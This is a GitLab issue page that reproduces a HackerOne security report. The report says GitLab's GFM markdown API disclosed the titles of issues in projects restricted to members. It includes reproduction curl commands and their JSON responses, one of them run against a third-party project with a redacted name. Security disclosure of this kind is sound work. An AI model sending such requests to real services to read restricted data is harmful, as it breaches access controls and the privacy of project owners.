Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #350691
Closed
Open
Issue created Jan 19, 2022 by GitLab SecurityBot@gitlab-securitybotReporter

GFM markdown API discloses issue titles of limited projects

HackerOne report #1450306 by shells3c on 2022-01-15, assigned to @nmalcolm:

Report | How To Reproduce

Report

Summary

GFM markdown API allows unauthenticated users to read issue titles of projects that have permission for issues set to Only Project Members

Steps to reproduce
  1. Create a project, set Issues visibility to Only Project Members
  2. Create an issue
  3. Execute this command (replace [user]/[project] with your project namespace):
curl -H 'Content-Type: application/json' -d '{"project":"[username]/[project]","text":"See #1","gfm":true}' 'https://gitlab.com/api/v4/markdown'  
  1. The response will disclose the title of issue #1 (attribute title):
{"html":"\u003cp data-sourcepos=\"1:1-1:6\" dir=\"auto\"\u003eSee \u003ca href=\"https://gitlab.com/[user]/[project]/-/issues/1\" data-original=\"#1\" data-link=\"false\" data-link-reference=\"false\" data-project=\"[Project ID]\" data-issue=\"[Issue ID]\" data-reference-type=\"issue\" data-container=\"body\" data-placement=\"top\" title=\"This is a private issue\" class=\"gfm gfm-issue has-tooltip\"\u003e#1\u003c/a\u003e\u003c/p\u003e"}  
Examples

Visit: https://gitlab.com/[REDACTED]/alertmanager/-/issues and you can see that the visibility is restricted. Now execute this command:

curl -H 'Content-Type: application/json' -d '{"project":"[REDACTED]/alertmanager","text":"See #7","gfm":true}' 'https://gitlab.com/api/v4/markdown'  

Response:

{"html":"\u003cp data-sourcepos=\"1:1-1:6\" dir=\"auto\"\u003eSee \u003ca href=\"https://gitlab.com/[REDACTED]/alertmanager/-/issues/7\" data-original=\"#7\" data-link=\"false\" data-link-reference=\"false\" data-project=\"25681831\" data-issue=\"100690987\" data-reference-type=\"issue\" data-container=\"body\" data-placement=\"top\" title=\"Internal\" class=\"gfm gfm-issue has-tooltip\"\u003e#7\u003c/a\u003e\u003c/p\u003e"}  

As you can see, the title of issue #7 is Internal, you can check other issues if you want

Output of checks

This bug happens on GitLab.com

Impact

Accessing all issue titles of projects have visibility of issues is Only Project Members

How To Reproduce

Please add reproducibility information to this section:

Edited Jun 03, 2022 by Costel Maxim
Assignee
Assign to
Time tracking